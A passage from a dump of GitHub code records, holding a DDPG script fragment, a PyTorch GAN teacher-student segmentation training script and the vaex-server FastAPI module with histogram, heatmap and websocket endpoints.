DDPG(a_dim, s_dim, a_bound)\n ddpg.load('./log/model.ckpt')\n\n var = 3 # control exploration\n t1 = time.time()\n total_reward = 0\n for i in range(10):\n state = env.reset()\n for j in range(MAX_EP_STEPS):\n env.render()\n action = ddpg.choose_action(state) # direct action for test\n state,reward,done,_ = env.step(action)\n total_reward += reward\n if done:\n break\n ave_reward = total_reward/300\n print 
('Evaluation Average Reward:',ave_reward)\n print('Running time: ', time.time() - t1)\n\nif __name__ == \"__main__\":\n train()\n # validate()\n pass","repo_name":"lab821/SDN-DRL","sub_path":"algorithms/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":7802,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"21063112955","text":"import wandb\nwandb.login()\n\nuser = \"ragu2399\"\nproject = \"gan_trail\"\ndisplay_name = \"t2\"\n\nwandb.init(entity=user, project=project, name=display_name)\n\nimport torch\nimport math\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom tqdm import tqdm\nimport torch.nn as nn\nimport torch.optim as optim\nfrom loss import *\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom torchsummary import summary\nimport Teacher_model\nimport student_model\nimport Discriminator_model\nimport os\nfrom utils import (\n save_checkpoint,\n get_loaders,\n check_accuracy,\n save_predictions_as_imgs,\n)\ntorch.cuda.empty_cache()\nrandom_seed = 242 # or any of your favorite number \ntorch.manual_seed(random_seed)\ntorch.cuda.manual_seed(random_seed)\ntorch.backends.cudnn.deterministic = True\nnp.random.seed(random_seed)\ntorch.cuda.is_available()\n\n\n# Hyperparameters etc.\n\nLEARNING_RATE = 1e-5\nBETA_1=0.5\nBETA_2=0.999\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nBATCH_SIZE = 1\nNUM_EPOCHS = 1000\nNUM_WORKERS =12\nIMAGE_HEIGHT = 256 # 1280 originally\nIMAGE_WIDTH = 256 # 1918 originally\nPIN_MEMORY = True\nLOAD_MODEL = False\nTRAIN_IMG_DIR = \"../ORDERED_ENDOCV_DATASET/IMAGES/\"\nTRAIN_MASK_DIR = \"../ORDERED_ENDOCV_DATASET/MASKS/\"\nVAL_IMG_DIR = \"../ORDERED_ENDOCV_DATASET/VALIDATION_IMAGES/\"\nVAL_MASK_DIR = \"../ORDERED_ENDOCV_DATASET/VALIDATION_MASK/\"\nCLIP_LIMIT=6\nBATCH_INDEX=400\nNUM_IMAGES=os.listdir(TRAIN_IMG_DIR)\nNUM_IMAGES=len(NUM_IMAGES)\nprint(f'Total number of Images : {NUM_IMAGES}')\n\nTEACHER_1_PATH=\"./WEIGHTS/TEACHER_1.pth\" #SPECIFY TEACHER 1 MODEL PATH\nTEACHER_2_PATH=\"./WEIGHTS/TEACHER_2.pth\" #SPECIFY TEACHER 2 MODEL PATH\nSTUDENT_PATH=\"./WEIGHTS/STUDENT.pth\" #SPECIFY STUDENT MODEL PATH\nDISCRIMINATOR_PATH=\"./WEIGHTS/DISCRIMINATOR.pth\" #SPECIFY TEACHER 1 MODEL PATH\n\n\n#ALL_LOSS_FUNCTIONS\nlossfn_1 = DiceLoss()\nlossfn_2 = DiceBCELoss()\nlossfn_3 = IoULoss()\nlossfn_4 = FocalLoss()\nlossfn_5 = TverskyLoss()\nlossfn_6 = FocalTverskyLoss()\nlossfn_7 = ComboLoss()\n\n\ndef get_models(DEVICE): \n \n # Teacher network. Note: For BraTS, the total number of modalities/sequences is 4. Also, BraTS has 4 segmentation classes.\n teacher_model =Teacher_model.UNet_SAB().to(DEVICE)\n teacher_pretrained_statedict = torch.load(TEACHER_PATH)\n teacher_model.load_state_dict(teacher_pretrained_statedict[\"state_dict\"])\n print(\"Created teacher model and with trained_weights.\")\n\n # Freeze teacher weights.\n for param in teacher_model.parameters():\n param.requires_grad = False\n \n # Student network. Note: For BraTS, there is only 1 post-contrast modalities/sequences, so the student recieves 3. \n # Also, BraTS has 4 segmentation classes.\n generator_model = student_model.UNet_SAB_STUDENT().to(DEVICE)\n generator_pretrained_statedict = torch.load(STUDENT_PATH)\n generator_model.load_state_dict(generator_pretrained_statedict[\"state_dict\"])\n print(f' Created generator model (i.e., the student model) from {STUDENT_PATH}')\n\n # Discriminator network. 
The discriminator recieves the student input modalities/sequences (i.e., 3 for BraTS) and the \n # output segmentation map (i.e., 4 classes for BraTS) as input (i.e., a total of 3+4 channels).\n discriminator_model = Discriminator_model.Discriminator().to(DEVICE)\n print(\"Created discriminator/critic.\")\n \n return teacher_model, generator_model, discriminator_model\n\n\n\ndef get_optimizers(generator_model, discriminator_model):\n\n # Select an optimizer for the generator\n gen_optimizer = torch.optim.Adam(generator_model.parameters(), lr=LEARNING_RATE, betas=(BETA_1, BETA_2))\n\n # Select an optimizer for the discriminator\n disc_optimizer = torch.optim.Adam(discriminator_model.parameters(), lr=LEARNING_RATE, betas=(BETA_1,BETA_2))\n \n return gen_optimizer, disc_optimizer\n\n\n\ndef get_criteria(device):\n \n # Criterion\n criterion_MSE = torch.nn.MSELoss().to(device)\n\n criterion_CE = nn.CrossEntropyLoss().to(device)\n\n # softmax\n n_softmax = nn.Softmax(dim=1).to(device)\n \n return criterion_MSE, criterion_CE, n_softmax\n\n\n\ndef load_pre_trained_model(generator_model,discriminator_model):\n\n\n # LOAD PRE-TRINAED STUDENT\n student_pretrained_statedict = torch.load(STUDENT_PATH)\n generator_model.load_state_dict(student_pretrained_statedict[\"state_dict\"])\n print(f' Generator model loaded from {STUDENT_PATH}' )\n\n # LOAD PRE-TRINAED DISCRIMINATOR\n Discriminator_pretrained_statedict = torch.load(DISCRIMINATOR_PATH)\n discriminator_model.load_state_dict(Discriminator_pretrained_statedict[\"state_dict\"])\n print(f' DISC model loaded from {DISCRIMINATOR_PATH}' )\n\n \n return generator_model,discriminator_model \n\ndef Plot(input_image,predicted,target):\n input_image=input_image.cpu().detach().numpy().astype(np.float32)\n predicted=predicted.cpu().detach().numpy().astype(np.float32)\n target=target.cpu().detach().numpy().astype(np.float32)\n \n num_images=input_image.shape[0]\n \n for image,pred,targ in zip(input_image,predicted,target):\n\n \n image=np.swapaxes(image,0,2)\n pred=np.swapaxes(pred,0,2)\n targ=np.swapaxes(targ,0,2)\n\n \n plt.figure(figsize=(20,20))\n plt.subplot(1,3,1,title='input')\n plt.imshow(image)\n plt.subplot(1,3,2,title='predicted')\n pred[pred >= 0.5]=1.0\n pred[pred < 0.5]=0.0\n plt.imshow(pred)\n plt.subplot(1,3,3,title='Target')\n plt.imshow(targ)\n plt.show()\n\ndef train_log(loss_1,batch_idx,epoch):\n wandb.log({\"DiceLoss\": loss_1},step=batch_idx)\n \n \ndef training_epoch(models, criteria, optimizers, trainset, device,epoch):\n \n # Unpack\n teacher_model, generator_model, discriminator_model = models\n criterion_MSE, criterion_CE = criteria\n gen_optimizer, disc_optimizer = optimizers\n \n # Counter\n sample_count = 0.0\n \n # Loss tracker\n mean_LS = 0.0\n mean_LHD = 0.0\n\n # Set to train\n generator_model.train()\n teacher_model.train()\n discriminator_model.train()\n\n \n loop = tqdm(trainset)\n # Go over each batch of the training set\n\n for batch_idx, (datas, targets) in enumerate(loop):\n# datas,targets=next(iter(loop))\n\n# print(\"--- SAMPLE\",int(sample_count),\" ---\")\n\n ###############################################\n ############### GET INPUT DATA ################\n ############################################### \n\n x_teacher = datas.to(device=DEVICE)\n x_student = datas.to(device=DEVICE)\n y = targets.long().unsqueeze(1).to(device=DEVICE)\n\n\n # Get the teacher output for this sample. 
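No gradients are tracked here because the teacher is frozen. 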
This will be the real segmentation map.\n with torch.no_grad():\n real_segmap, real_features_0, real_features_1,real_features_2,real_features_3 = teacher_model(x_teacher)\n\n ###########################################\n ########### TRAIN THE GENERATOR ###########\n ###########################################\n\n # zero the generator gradient\n gen_optimizer.zero_grad()\n\n # Run the input data through the generator\n fake_segmap, fake_features_0, fake_features_1, fake_features_2, fake_features_3 = generator_model(x_student)\n\n # Feed the disc the \"fake\" data\n disc_fake_adv = discriminator_model(fake_segmap, x_student, fake_features_0, fake_features_1, fake_features_2, fake_features_3)\n\n # Create real and fake labels.\n disc_out_shape = disc_fake_adv.shape\n real = torch.ones(disc_out_shape).to(device)\n fake = torch.zeros(disc_out_shape).to(device)\n\n # Compute adversarial loss.\n gen_loss_GAN = criterion_MSE(disc_fake_adv, real)\n\n # Compute voxel-base loss with GROUND TRUTH\n gen_loss_VOX=lossfn_1(fake_segmap, y)\n\n # gen_loss_VOX = criterion_CE(fake_segmap, y)\n\n # Compute TOTAL gen loss, back-propogate, and step generator optimizer forward\n gen_loss = gen_loss_VOX + ((0.2)*gen_loss_GAN)\n gen_loss.backward()\n torch.nn.utils.clip_grad_norm_(generator_model.parameters(), CLIP_LIMIT)\n gen_optimizer.step()\n\n\n #PLOT GENERATOR OUTPUT\n # if batch_idx%BATCH_INDEX==0:\n if batch_idx%BATCH_INDEX==0:\n\n print(f'EPOCH : {epoch}')\n print(f'DICE loss : {gen_loss_VOX}')\n\n Plot(x_teacher,fake_segmap,y)\n if epoch==0:\n train_log(gen_loss_VOX,(batch_idx*BATCH_SIZE),epoch)\n else:\n train_log(gen_loss_VOX,((batch_idx*BATCH_SIZE)+(NUM_IMAGES*epoch)),epoch)\n\n ###############################################\n ########### TRAIN THE DISCRIMINATOR ###########\n ###############################################\n\n # zero the discriminator gradient\n disc_optimizer.zero_grad()\n\n # REMOVE GRADIENT FOR GENERATOR\n fake_segmap = fake_segmap.detach()\n fake_features_0=fake_features_0.detach()\n fake_features_1=fake_features_1.detach()\n fake_features_2=fake_features_2.detach()\n fake_features_3=fake_features_3.detach()\n\n\n # Feed the disc the \"real\" data r\n disc_real = discriminator_model(real_segmap, x_student, real_features_0, real_features_1,real_features_2,real_features_3)\n disc_loss_real = criterion_MSE(disc_real, real)\n\n\n # Feed the disc the \"fake\" data \n disc_fake = discriminator_model(fake_segmap, x_student, fake_features_0, fake_features_1, fake_features_2, fake_features_3 )\n disc_loss_fake = criterion_MSE(disc_fake, fake)\n\n\n # Compute total discriminator loss.\n disc_loss = disc_loss_real + disc_loss_fake\n\n # Determine if we should update the discriminator for this sample.\n disc_real_mean = torch.mean(torch.ge(disc_real,0.5).float())\n disc_fake_mean = torch.mean(torch.le(disc_fake,0.5).float())\n disc_mean = (disc_real_mean + disc_fake_mean)/2.0\n\n # Back-propogate the loss and step discriminator optimizer forward, if discriminator performance is\n # under the threshold.\n if(disc_mean <= 0.8):\n disc_loss.backward() \n disc_optimizer.step()\n\n\n # Move data from GPU to CPU. 
This is done in order to prevent a strange CUDA error encountered during training, which \n # prints the message: \"CUDA: an illegal memory access was encountered\".\n x_teacher = x_teacher.detach().to('cpu')\n x_student = x_student.detach().to('cpu')\n y = y.detach().to('cpu')\n real_segmap = real_segmap.detach().to('cpu')\n real_features_0=real_features_0.detach()\n real_features_1=real_features_1.detach()\n real_features_2=real_features_2.detach()\n real_features_3=real_features_3.detach()\n\n disc_fake_adv = disc_fake_adv.detach().to('cpu')\n real = real.detach().to('cpu')\n fake = fake.detach().to('cpu')\n gen_loss_GAN = gen_loss_GAN.detach().to('cpu')\n gen_loss_VOX = gen_loss_VOX.detach().to('cpu')\n gen_loss = gen_loss.detach().to('cpu')\n fake_segmap = fake_segmap.detach().to('cpu')\n fake_features_0=fake_features_0.detach()\n fake_features_1=fake_features_1.detach()\n fake_features_2=fake_features_2.detach()\n fake_features_3=fake_features_3.detach()\n\n disc_real = disc_real.detach().to('cpu')\n disc_loss_real = disc_loss_real.detach().to('cpu')\n disc_fake = disc_fake.detach().to('cpu')\n disc_loss_fake = disc_loss_fake.detach().to('cpu')\n disc_loss = disc_loss.detach().to('cpu')\n disc_real_mean = disc_real_mean.detach().to('cpu')\n disc_fake_mean = disc_fake_mean.detach().to('cpu')\n disc_mean = disc_mean.detach().to('cpu')\n\n # Update loss trackers.\n mean_LS = mean_LS + gen_loss.item()\n mean_LHD = mean_LHD + disc_loss.item()\n\n # Increment sample counter. \n sample_count+=1.0\n\n # Find epoch loss.\n mean_LS = mean_LS/sample_count\n mean_LHD = mean_LHD/sample_count\n\n\n loop.set_postfix(loss=gen_loss_VOX.item())\n\n\n return (teacher_model, generator_model,discriminator_model), (gen_optimizer, disc_optimizer), (mean_LS, mean_LHD)\n\n\n# Perform validation for this epoch.\n\n\n\ndef main():\n train_transform = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.ShiftScaleRotate(shift_limit=0.05, scale_limit=0.05, rotate_limit=15, p=0.5),\n A.Rotate(limit=35, p=0.5),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.1),\n A.RandomBrightnessContrast(p=0.5),\n ToTensorV2(),\n ],\n )\n\n val_transforms = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.ShiftScaleRotate(shift_limit=0.05, scale_limit=0.05, rotate_limit=15, p=0.5),\n A.Rotate(limit=35, p=0.5),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.1),\n A.RandomBrightnessContrast(p=0.5),\n ToTensorV2(),\n ],\n )\n\n\n train_loader, val_loader = get_loaders(\n TRAIN_IMG_DIR,\n TRAIN_MASK_DIR,\n VAL_IMG_DIR,\n VAL_MASK_DIR,\n BATCH_SIZE,\n train_transform,\n val_transforms,\n NUM_WORKERS,\n PIN_MEMORY,\n )\n \n validate_vm_list = []\n running_vm = 0.0\n #LOADING_MODEL\n teacher_model, generator_model, discriminator_model = get_models(DEVICE) \n summary(teacher_model,(3,512,512))\n summary(generator_model,(3,512,512))\n summary(discriminator_model,[(1,512,512),(3,512,512),(32,512,512),(128,512,512),(128,512,512),(32,512,512)])\n #GETTING OPTIMIZERS\n gen_optimizer, disc_optimizer = get_optimizers(generator_model, discriminator_model)\n #GETTING_CRITERIA\n criterion_MSE, criterion_CE, n_softmax = get_criteria(DEVICE)\n \n \n #LOADING PRE TRAINED WEIGHTS\n if LOAD_MODEL:\n generator_model,discriminator_model = load_pre_trained_model( generator_model,discriminator_model)\n\n\n scheduler = torch.optim.lr_scheduler.StepLR(gen_optimizer, step_size=10, gamma=0.1)\n\n\n for epoch in range(NUM_EPOCHS):\n print(f'{epoch} EPOCH LR {scheduler.get_last_lr()}' )\n 
wandb.watch(generator_model,log=\"all\")\n \n \n models, optimizers, training_losses = training_epoch((teacher_model, generator_model, discriminator_model), (criterion_MSE, criterion_CE), (gen_optimizer, disc_optimizer), train_loader, DEVICE,epoch)# train_fn(train_loader, model, optimizer,epoch)#, loss_fn)#, scaler)\n\n\n teacher_model, generator_model, discriminator_model = models\n gen_optimizer, disc_optimizer = optimizers\n mean_LS, mean_LHD = training_losses \n\n\n \n ###########################################\n ########## SAVE MODEL PARAMETERS ##########\n ###########################################\n\n\n\n ##Save generator and discriminator model and optimizer.\n \n gen_checkpoint = {\n \"state_dict\": generator_model.state_dict(),\n \"optimizer\":gen_optimizer.state_dict(),\n }\n model_name=\"Generator\"\n save_checkpoint(gen_checkpoint,epoch,model_name)\n \n dis_checkpoint = {\n \"state_dict\": discriminator_model.state_dict(),\n \"optimizer\":disc_optimizer.state_dict(),\n }\n model_name=\"discriminator\"\n save_checkpoint(dis_checkpoint,epoch,model_name)\n\n scheduler.step()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ragu2399/XP-NET","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":15554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17078160302","text":"import threading\nfrom typing import List, Union, Optional, Dict\nimport time\nimport asyncio\nimport io\nimport logging\nimport sys\nimport os\nimport pathlib\nimport contextlib\nimport json\n\n\nfrom fastapi import FastAPI, Query, Path, Depends, Request, WebSocket, APIRouter, HTTPException\nfrom fastapi.security import OAuth2PasswordBearer\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import Response\nfrom fastapi.openapi.docs import get_swagger_ui_html\nimport requests\n\n\nfrom pydantic import BaseModel\nfrom starlette.responses import HTMLResponse, PlainTextResponse\n\n\nimport vaex\nimport vaex.server\nimport vaex.settings\nimport vaex.server.websocket\n\nlogger = logging.getLogger(\"vaex.server\")\nVAEX_FAVICON = 'https://vaex.io/img/logos/vaex_alt.png'\nHERE = pathlib.Path(__file__).parent\n\n\n\nclass ImageResponse(Response):\n media_type = \"image/png\"\n\n\nclass HistogramInput(BaseModel):\n dataset_id: str\n expression: str\n shape: int = 128\n min: Optional[Union[float, int, str]] = None\n max: Optional[Union[float, int, str]] = None\n filter: Optional[str] = None\n virtual_columns: Optional[Dict[str, str]] = None\n\n\nclass HistogramOutput(BaseModel):\n dataset_id: str\n # expression: str\n # what: str\n # bins: List[int]\n centers: List[float]\n # edges: List[float]\n values: Union[List[float], List[int]] # counts\n\n\nclass HeatmapInput(BaseModel):\n dataset_id: str\n expression_x: str\n expression_y: str\n shape_x: int = 128\n shape_y: int = 128\n min_x: Optional[Union[float, int, str]] = None\n max_x: Optional[Union[float, int, str]] = None\n min_y: Optional[Union[float, int, str]] = None\n max_y: Optional[Union[float, int, str]] = None\n filter: Optional[str] = None\n virtual_columns: Optional[Dict[str, str]] = None\n\n\nclass HeatmapOutput(BaseModel):\n dataset_id: str\n expression_x: str\n expression_y: str\n # expression: str\n # what: str\n # bins: List[int]\n # centers: List[float]\n centers_x: List[float]\n centers_y: List[float]\n # edges: List[float]\n values: Union[List[List[float]], List[List[int]]] # counts\n\n\ndatasets = {}\n\nopenapi_tags = [\n {\n 
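# tags used to group the quick endpoints in the generated OpenAPI docs\n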
\"name\": \"quick\",\n \"description\": \"Quick API for common cases\",\n }\n\n]\n\nrouter = APIRouter()\npath_dataset = Path(..., title=\"The name of the dataset\", description=\"The name of the dataset\")\n\n\n@router.get(\"/hello\", include_in_schema=False)\nasync def hello():\n return \"hi\"\n\n\n@router.get(\"/\", response_class=HTMLResponse, include_in_schema=False)\nasync def root():\n with (HERE / 'index.html').open() as f:\n content = f.read()\n data = []\n for name, ds in datasets.items():\n data.append({\n 'name': name,\n 'rows': ds.row_count,\n 'column': list(ds),\n 'schema': [{'name': k, 'type': str(vaex.dtype(v))} for k, v in ds.schema().items()]\n })\n content = content.replace('// DATA', 'app.$data.datasets = %s\\n app.$data.graphql = %s' % (json.dumps(data), json.dumps(vaex.settings.server.graphql)))\n return content\n\n\n@router.get(\"/dataset\", summary=\"Lists all dataset names\")\nasync def dataset():\n return list(datasets.keys())\n\n\n@router.get(\"/dataset/{dataset_id}\", summary=\"Meta information about a dataset (schema etc)\")\nasync def dataset(dataset_id: str = path_dataset):\n with get_df(dataset_id) as df:\n schema = {k: str(v) for k, v in df.schema().items()}\n return {\"id\": dataset_id, \"row_count\": len(df), \"schema\": schema}\n\n@contextlib.contextmanager\ndef get_df(name):\n if name not in datasets:\n raise HTTPException(status_code=404, detail=f\"dataset {name!r} not found\")\n yield vaex.from_dataset(datasets[name])\n\n\ndef _number(v):\n if v is None:\n return v\n try:\n return float(v)\n except:\n return v\n\nasync def _compute_histogram(input: HistogramInput) -> HistogramOutput:\n with get_df(input.dataset_id) as df:\n limits = [_number(input.min), _number(input.max)]\n limits = df.limits(input.expression, limits, delay=True)\n await df.execute_async()\n limits = await limits\n\n counts = df.count(binby=input.expression, limits=limits, shape=input.shape, delay=True, selection=input.filter)\n await df.execute_async()\n counts = await counts\n return df, counts, limits\n\n\n@router.get(\"/histogram/{dataset_id}/{expression}\", response_model=HistogramOutput, tags=[\"quick\"], summary=\"histogram data (1d)\")\nasync def histogram(input: HistogramInput = Depends(HistogramInput)) -> HistogramOutput:\n df, counts, limits = await _compute_histogram(input)\n centers = df.bin_centers(input.expression, limits, input.shape)\n return HistogramOutput(dataset_id=input.dataset_id, values=counts.tolist(), centers=centers.tolist())\n\n\n@router.post(\"/histogram\", response_model=HistogramOutput, tags=[\"quick\"], summary=\"histogram data (1d)\")\nasync def histogram(input: HistogramInput) -> HistogramOutput:\n df, counts, limits = await _compute_histogram(input)\n centers = df.bin_centers(input.expression, limits, input.shape)\n return HistogramOutput(dataset_id=input.dataset_id,\n expression=input.expression,\n values=counts.tolist(),\n centers=centers.tolist())\n\n\n@router.get(\"/histogram.plot/{dataset_id}/{expression}\", response_class=ImageResponse, tags=[\"quick\"], summary=\"Quick histogram plot\")\nasync def histogram_plot(input: HistogramInput = Depends(HistogramInput)) -> HistogramOutput:\n import matplotlib\n import matplotlib.pyplot as plt\n df, counts, limits = await _compute_histogram(input)\n matplotlib.use('agg', force=True)\n fig = plt.figure()\n df.viz.histogram(input.expression, limits=limits, shape=input.shape, grid=counts)\n with io.BytesIO() as f:\n fig.canvas.print_png(f)\n plt.close(fig)\n return 
ImageResponse(content=f.getvalue())\n\n\nasync def _compute_heatmap(input: HeatmapInput) -> HeatmapOutput:\n with get_df(input.dataset_id) as df:\n limits_x = [_number(input.min_x), _number(input.max_x)]\n limits_y = [_number(input.min_y), _number(input.max_y)]\n limits_x = df.limits(input.expression_x, limits_x, delay=True)\n limits_y = df.limits(input.expression_y, limits_y, delay=True)\n await df.execute_async()\n limits_x = await limits_x\n limits_y = await limits_y\n\n limits = [limits_x, limits_y]\n state = {\n 'virtual_columns': input.virtual_columns or {}\n }\n df.state_set(state)\n shape = [input.shape_x, input.shape_y]\n counts = df.count(binby=[input.expression_x, input.expression_y], limits=limits, shape=shape, delay=True, selection=input.filter)\n await df.execute_async()\n counts = await counts\n return df, counts, limits\n\n\n@router.get(\"/heatmap/{dataset_id}/{expression_x}/{expression_y}\", response_model=HeatmapOutput, tags=[\"quick\"], summary=\"heatmap data (2d)\")\nasync def heatmap(input: HeatmapInput = Depends(HeatmapInput)) -> HeatmapOutput:\n df, counts, limits = await _compute_heatmap(input)\n centers_x = df.bin_centers(input.expression_x, limits[0], input.shape_x)\n centers_y = df.bin_centers(input.expression_y, limits[1], input.shape_y)\n return HeatmapOutput(dataset_id=input.dataset_id,\n expression_x=input.expression_x,\n expression_y=input.expression_y,\n values=counts.tolist(),\n centers_x=centers_x.tolist(),\n centers_y=centers_y.tolist())\n\n\n@router.post(\"/heatmap\", response_model=HeatmapOutput, tags=[\"quick\"], summary=\"heatmap data (2d)\")\nasync def heatmap(input: HeatmapInput) -> HeatmapOutput:\n df, counts, limits = await _compute_heatmap(input)\n centers_x = df.bin_centers(input.expression_x, limits[0], input.shape_x)\n centers_y = df.bin_centers(input.expression_y, limits[1], input.shape_y)\n return HeatmapOutput(dataset_id=input.dataset_id,\n expression_x=input.expression_x,\n expression_y=input.expression_y,\n values=counts.tolist(),\n centers_x=centers_x.tolist(),\n centers_y=centers_y.tolist())\n\n\n@router.get(\"/heatmap.plot/{dataset_id}/{expression_x}/{expression_y}\", response_class=ImageResponse, tags=[\"quick\"], summary=\"Quick heatmap plot\")\nasync def heatmap_plot(input: HeatmapInput = Depends(HeatmapInput), f: str =\"identity\") -> HeatmapOutput:\n import matplotlib\n import matplotlib.pyplot as plt\n df, counts, limits = await _compute_heatmap(input)\n matplotlib.use('agg', force=True)\n fig = plt.figure()\n df.viz.heatmap(input.expression_x, input.expression_y, limits=limits, shape=[input.shape_x, input.shape_y], grid=counts, f=f)\n with io.BytesIO() as f:\n fig.canvas.print_png(f)\n plt.close(fig)\n return ImageResponse(content=f.getvalue())\n\n\n@router.websocket(\"/websocket\")\nasync def websocket_endpoint(websocket: WebSocket):\n await websocket.accept()\n handler = vaex.server.websocket.WebSocketHandler(websocket.send_bytes, service_threaded)\n while True:\n data = await websocket.receive()\n if data['type'] == 'websocket.disconnect':\n return\n # see https://docs.python.org/3/library/asyncio-task.html#asyncio.create_task\n # TODO: replace after we drop 36 support asyncio.create_task(handler.handle_message(data['bytes']))\n asyncio.ensure_future(handler.handle_message(data['bytes']))\n\n\napp = FastAPI(\n title=\"Vaex dataset/dataframe API\",\n description=\"Vaex: Fast data aggregation\",\n version=vaex.__version__[\"vaex-server\"],\n openapi_tags=openapi_tags,\n 
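# the default docs route is disabled; a custom /docs with the Vaex favicon is defined below\n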
docs_url=None,\n)\n\n@app.exception_handler(vaex.tasks.TaskCheckError)\nasync def task_check_exception_handler(request, exc):\n return PlainTextResponse(str(exc), status_code=413)\n\n\napp.include_router(router)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n@app.get(\"/docs\", include_in_schema=False)\nasync def custom_swagger_ui_html():\n return get_swagger_ui_html(\n openapi_url=app.openapi_url,\n title=app.title + \" - Swagger UI\",\n swagger_favicon_url=VAEX_FAVICON,\n )\n\n@app.middleware(\"http\")\nasync def add_process_time_header(request: Request, call_next):\n start_time = time.time()\n executor = vaex.dataframe.get_main_executor()\n start_passes = executor.passes\n response = await call_next(request)\n process_time = time.time() - start_time\n response.headers[\"X-Process-Time\"] = str(process_time)\n response.headers[\"X-Data-Passes\"] = str(executor.passes - start_passes)\n return response\n\n\n\n# used for testing\nclass Server(threading.Thread):\n def __init__(self, port, host='localhost', **kwargs):\n self.port = port\n self.host = host\n self.kwargs = kwargs\n self.started = threading.Event()\n self.stopped = threading.Event()\n super().__init__(name=\"fastapi-thread\")\n self.setDaemon(True)\n\n def set_datasets(self, dfs):\n global datasets\n dfs = {df.name: df for df in dfs}\n update_service(dfs)\n\n def run(self):\n self.mainloop()\n\n def serve_threaded(self):\n logger.debug(\"start thread\")\n self.start()\n logger.debug(\"wait for thread to run\")\n self.started.wait()\n logger.debug(\"make tornado io loop the main thread's current\")\n\n def wait_until_serving(self):\n for n in range(10):\n url = f'http://{self.host}:{self.port}/'\n try:\n response = requests.get(url)\n except requests.exceptions.ConnectionError:\n pass\n else:\n if response.status_code == 200:\n return\n time.sleep(0.05)\n else:\n raise RuntimeError(f'Server at {url} does not seem to be running')\n\n def mainloop(self):\n logger.info(\"serving at http://%s:%d\" % (self.host, self.port))\n\n from uvicorn.config import Config\n from uvicorn.server import Server\n if sys.version_info[:2] < (3, 7):\n # make python 3.6 work\n import asyncio\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n # uvloop will trigger a: RuntimeError: There is no current event loop in thread 'fastapi-thread'\n config = Config(app, host=self.host, port=self.port, **self.kwargs, loop='asyncio')\n self.server = Server(config=config)\n self.started.set()\n try:\n self.server.run()\n except:\n logger.exception(\"Oops, server stopped unexpectedly\")\n finally:\n self.stopped.set()\n\n def stop_serving(self):\n logger.debug(\"stopping server\")\n self.server.should_exit = True\n if self.stopped.wait(1) is not None:\n logger.error('stopping server failed')\n logger.debug(\"stopped server\")\n\n\nfor name, path in vaex.settings.server.files.items():\n datasets[name] = vaex.open(path).dataset\n\n\ndef add_graphql():\n import vaex.graphql\n import graphene\n from starlette.graphql import GraphQLApp\n dfs = {name: vaex.from_dataset(ds) for name, ds in datasets.items()}\n Query = vaex.graphql.create_query(dfs)\n schema = graphene.Schema(query=Query)\n app.add_route(\"/graphql\", GraphQLApp(schema=schema))\n\n\ndef ensure_example():\n if 'example' not in datasets:\n datasets['example'] = vaex.example().dataset\n\nensure_example()\n\n\ndef update_service(dfs=None):\n global service_threaded\n import vaex.server.service\n if 
dfs is None:\n dfs = {name: vaex.from_dataset(dataset) for name, dataset in datasets.items()}\n\n service_bare = vaex.server.service.Service(dfs)\n server_thread_count = 1\n threads_per_job = 32\n service_threaded = vaex.server.service.AsyncThreadedService(service_bare, server_thread_count, threads_per_job)\n\n\ndef main(argv=sys.argv):\n import uvicorn\n import argparse\n parser = argparse.ArgumentParser(argv[0])\n parser.add_argument(\"filename\", help=\"filename for dataset\", nargs='*')\n parser.add_argument('--add-example', default=False, action='store_true', help=\"add the example dataset\")\n parser.add_argument(\"--host\", help=\"address to bind the server to (default: %(default)s)\", default=\"0.0.0.0\")\n parser.add_argument(\"--base-url\", help=\"External base url (default is :port)\", default=None)\n parser.add_argument(\"--port\", help=\"port to listen on (default: %(default)s)\", type=int, default=8081)\n parser.add_argument('--verbose', '-v', action='count', help='show more info', default=2)\n parser.add_argument('--quiet', '-q', action='count', help=\"less info\", default=0)\n parser.add_argument('--graphql', default=vaex.settings.server.graphql, action='store_true', help=\"Add graphql endpoint\")\n config = parser.parse_args(argv[1:])\n\n verbosity = [\"ERROR\", \"WARNING\", \"INFO\", \"DEBUG\"]\n logging.getLogger(\"vaex\").setLevel(verbosity[config.verbose - config.quiet])\n\n if config.filename:\n datasets.clear()\n for path in config.filename:\n if \"=\" in path:\n name, path = path.split('=')\n df = vaex.open(path)\n datasets[name] = df.dataset\n else:\n df = vaex.open(path)\n name, _, _ = vaex.file.split_ext(os.path.basename(path))\n datasets[name] = df.dataset\n if not datasets:\n datasets['example'] = vaex.example().dataset\n if config.add_example:\n ensure_example()\n use_graphql = config.graphql\n if use_graphql:\n add_graphql()\n update_service()\n host = config.host\n port = config.port\n base_url = config.base_url\n if not base_url:\n base_url = host\n if port != 80:\n base_url += f\":{port}\"\n for name in datasets:\n line = f\"{name}: http://{base_url}/dataset/{name} for REST or ws://{base_url}/{name} for websocket\"\n logger.info(line)\n\n uvicorn.run(app, port=port, host=host)\n\n\nif __name__ == \"__main__\":\n main()\nelse:\n update_service()\n if vaex.settings.server.graphql:\n add_graphql()\n","repo_name":"vaexio/vaex","sub_path":"packages/vaex-server/vaex/server/fastapi.py","file_name":"fastapi.py","file_ext":"py","file_size_in_byte":16318,"program_lang":"python","lang":"en","doc_type":"code","stars":8057,"dataset":"github-code","pt":"53"} +{"seq_id":"21656986943","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n:Purpose: This module contains tests and utilities relating to files and the\r\n filesystem.\r\n\r\n:Platform: Linux/Windows | 